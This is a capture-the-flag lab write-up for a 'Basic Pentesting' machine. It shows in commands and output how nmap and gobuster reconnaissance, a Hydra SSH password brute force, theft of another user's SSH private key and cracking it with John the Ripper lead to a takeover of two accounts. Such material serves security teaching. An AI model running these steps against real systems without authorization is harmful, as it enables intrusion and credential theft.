Basic Pentesting Writeup
Written on August 29th, 2022 by Mouse
This machine gives a basic introduction to elementary methods in pentesting websites. We go through service discovery, subdirectory enumeration, password and hash brute forcing, and Linux machine enumeration.
Recon
We start with a basic nmap scan to find open ports, then scan these ports more aggressively for more information.
Command:
nmap [target]
─$ nmap [target]
Starting Nmap 7.91 ( https://nmap.org ) at 2022-08-29 14:23 EDT
Nmap scan report for [target]
Host is up (0.026s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds
These are the open ports. Let’s scan each of these more aggressively. The most interesting parts of the scan results are shown below.
Command:
nmap [target] -A -p 22,80,139,445,8009,8080.
─$ sudo nmap [target] -p 22,80,139,445,8009,8080 -A -sV -sC -O 1 ⨯
Host is up (0.024s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.7
Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2022-08-29T14:36:05-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-08-29T18:36:05
|_ start_date: N/A
Nmap done: 1 IP address (1 host up) scanned in 20.49 seconds
We see SSH on port 22 is open, running OpenSSH 7.2p2. A webserver is being run on port 80, using Apache 2.4.18. Port 139 and 445 are using NetBIOS for Samba, port 8009 is running Apache Jserv and 8080 is running Apache Tomcat 9.0.7.
Let’s visit this webpage.
This is what the website looks like. There is not much information here. There is also no robots.txt file to hide any directories. A comment in the homepage’s source code mentions a ‘dev notes’ section. It sounds like there could be a subdomain or subdirectory called ‘devnotes’ or something similar.
Web Enumeration
Let’s use gobuster with SecList’s common.txt wordlist to brute-force subdomains.
Command:
gobuster dir -u [target] -w /path/to/seclists/Discovery/Web-Content/common.txt
└─$ gobuster dir -u [target] -w /usr/share/seclists/Discovery/Web-Content/common.txt
(...)
===============================================================
2022/08/29 14:56:13 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 297]
/.hta (Status: 403) [Size: 292]
/.htpasswd (Status: 403) [Size: 297]
/development (Status: 301) [Size: 320] [--> http://[target]/development/]
/index.html (Status: 200) [Size: 158]
/server-status (Status: 403) [Size: 301]
===============================================================
2022/08/29 14:56:26 Finished
===============================================================
.htaccess, .hta and .htpasswd are default Apache subdirectories. The development subdirectory looks interesting…
Navigating to this subdirectory, we find some text files.
j.txt contains:
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
dev.txt contains:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
These were some interesting messages.
The first message complements what we know from the nmap scan, and the second message tells us that J’s password is easy to crack.
We know from nmap that this server is running Ubuntu. Let’s use enum4linux to find out more about their web server, and maybe find some usernames.
Command:
enum4linux -a [target] > enum.txt
The most interesting part of the output is the enumerated usernames section. We see the following results.
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1000 Unix User\jan (Local User)
And we now have two usernames, and we’ve learnt the names of the elusive K and J.
Initial Access
We will use Hydra to try to crack Jan’s password for SSH, since we know it is weak. We use the username jan and the darkweb2017 top 10000 wordlist from SecLists.
Command:
hydra -l jan -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt [target] ssh
└─$ hydra -l jan -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt [target] ssh 255 ⨯
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-29 15:14:05
[22][ssh] host: [target] login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-29 15:41:43
We got a hit! Jan’s password is armando. We can now ssh into Jan’s account.
Command:
ssh jan@[target]
Lateral Movement
Looking around, we see that we can access Kay’s home directory, and access her SSH private key.
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
(...)
3Jt1/ZW3XCb76R75sG5h6Q4N8gu5c/M0cdq16H9MHwpdin9OZTqO2zNxFvpuXthY
-----END RSA PRIVATE KEY-----
jan@basic2:/home/kay/.ssh$ exit
logout
Connection to [target] closed.
Let’s try crack this with John the Ripper.
First, the ssh key is pasted into a text file, key.txt. We then use ssh2john to convert this private key into a form that John can understand, then we start cracking. The rockyou.txt wordlist is used.
Command:
python3 /usr/share/john/ssh2john.py key.txt > john.txt
john –wordlist /usr/share/wordlists/rockyou.txt john.txt
When I ran this command, I got a python error:
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'
After some Googling, I realised that this is probably an issue with using Python 3. I reran the command with python 2, and it worked.
After a few minutes, John spat out the cracked hash - beeswax. We now have kay’s password!
We can now SSH to kay’s account using the private key, and use the password. The private key has been pasted and saved into a file named id_rsa.
Command:
ssh -i id_rsa kay@[target]
At first, this didn’t work. I got a ‘warning: unprotected private key file’ error. This occurred because ssh private key files must have the appropriate permissions - the user should have read/write permissions, and no one else should. These permissions have the code rw——-, or 600. We change the permissions of id_rsa with chmod.
Command:
chmod 600 id_rsa.
When I tried to SSH into kay’s account again, it worked.
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$
We find the final password file, containing the final flag!
Tools Used
- Nmap
- Gobuster
- Enum4linux
- Hydra
- John the Ripper
Conclusion
In this room, we had a brief overview of a methodology for penetration testing on websites. We started out with some reconnaissance to find the website on the server, went on to enumerate the website and find the hidden /development subdirectory. We then used brute-forcing to find passwords, and eventually we managed to SSH into both user accounts.
